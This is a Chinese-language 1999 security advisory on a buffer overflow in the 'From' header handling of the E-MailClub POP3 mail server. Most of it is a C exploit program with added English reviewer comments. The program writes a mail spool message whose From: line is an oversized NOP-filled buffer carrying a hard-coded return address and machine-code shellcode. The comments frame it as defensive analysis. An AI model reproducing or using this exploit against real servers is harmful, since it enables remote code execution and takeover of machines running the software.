E-MailClub的'FROM'远程溢出发布时间:1999-11-19 更新时间:1999-11-19 严重程度:高 威胁程度:远程管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Misc详细描述 EMAILCLUB作为是一个由ADMIRAL SYSTEMS INC的MAIL服务 器包, 发现它有一个远程溢出漏洞,此漏洞可以通过 EMAILCLUB的 POP3服务器对进来的邮件缺少对‘FROM’正 确的边界检查 而导致的缓冲溢出;由于此MAIL程序在NT, WIN9X上运行,所以 可以导致目标机器上获得不同的危害程 度,尤其是NT中如果管理员 采用ADMIN权利在运行 EMAILCLUB。 测试代码
/*=============================================== ===========
E-MailClub Ver1.0.0.5 for Windows98J exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
================================================= ======================== */

/*
 * Reviewer summary of the listing below:
 *  - The program takes one argument, a mail spool path, and writes a single
 *    message into that file. It does no network I/O itself.
 *  - The value of the message's "From:" header is the whole of buf, i.e. a
 *    1999-byte string, so that header line is about 2 KB long. This is well
 *    past the 998-character line limit of RFC 5322. The advisory text above
 *    attributes the overflow to a missing bounds check on this field in the
 *    POP3 server.
 *  - Defensive takeaways: a server must bound the header length before
 *    copying it into a fixed-size buffer, and a spool message whose From:
 *    line is this long and padded with 0x90 bytes is a usable detection
 *    signal.
 */

/* NOTE(review): both header names were lost when the page was extracted;
 * the two directives are left exactly as found. */
#include
#include

/* Envelope line and Date header, written to the spool before "From:". */
#define HD1 \
"From exploit Wed Oct 27 01:53 JST 1999\n"\
"Date: Wed, 27 Oct 1999 01:53:00 +0900\n"

/* Remaining headers plus trailing blank lines, written after "Subject:". */
#define HD2 \
"Message-Id: <3815C9EBDC.E749HOGE@192.168.0.1>\n"\
"MIME-Version: 1.0\n"\
"Content-Transfer-Encoding: 7bit\n"\
"Content-Type: text/plain; charset=US-ASCII\n"\
"Content-Length: 1\n"\
"Status: U\n\n\n\n"

#define MAXBUF 2000     /* size of buf in main(); sets the From: value length */
#define MAXBUF2 500     /* not referenced anywhere in this listing */
#define NOP 0x90        /* fill byte used for all of buf */
#define RETADR 511      /* offset in buf where the four bytes of EIP are stored;
                           presumably where the target's saved return address
                           falls (inferred from the name, not shown here) */
#define EIP 0x7fc1415b  /* 32-bit value stored at RETADR; presumably specific
                           to the "Windows98J" build named in the header */

/* Sixteen initialised bytes in a 100-byte array; the rest is zero-filled.
 * Opaque machine-code payload, not analysed in this review. */
unsigned char exploit_code[100]={
0xb8,0x55,0x55,0x55,
0x55,0x50,0x50,0xB8,
0x96,0x91,0xFA,0x5F,
0x03,0xC0,0x50,0xc3,
};

/*
 * Builds the over-long From: value in buf and writes one complete message
 * (HD1, From:, To:, Subject:, HD2) to the file named by argv[1].
 * Exits with status 1 on a wrong argument count or if the file cannot be
 * opened for writing.
 */
main(int argc, char *argv[])
{
FILE *fp;
char buf[MAXBUF];
unsigned int ip;
/* Exactly one argument is required: the spool file to create. */
if (argc!=2){
printf("usage: %s mailspool\n",argv[0]);
exit(1);
}
/* "wb" truncates the file if it exists, replacing its previous contents. */
if ((fp=fopen(argv[1],"wb"))==NULL){
printf("Can not write to %s\n",argv[1]);
exit(1);
}
/* Fill the whole buffer with NOP and terminate it, giving a 1999-byte string. */
memset(buf,NOP,MAXBUF);
buf[MAXBUF-1]=0;
ip=EIP;
/* One byte just before the stored address; its purpose is not evident from
 * this page. */
buf[RETADR-1]=0xa0;
/* Store ip byte by byte, least-significant byte first. */
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
/* The length comes from strlen(), so the copy stops at the array's first zero
 * byte (after the 16 initialised bytes); no terminator is copied and the fill
 * on either side stays in place. */
strncpy(buf+RETADR+40,exploit_code,strlen (exploit_code));
/* Emit the message. Only the From: line carries the oversized value; the
 * other headers are fixed strings. */
fprintf(fp,"%s",HD1);
fprintf(fp,"From: %s \n",buf);
fprintf(fp,"To: you@your.host.net\n");
fprintf(fp,"Subject: subscribe exploit\n");
fprintf(fp,"%s",HD2);
fclose(fp);
}
解决方案 暂无 相关信息 |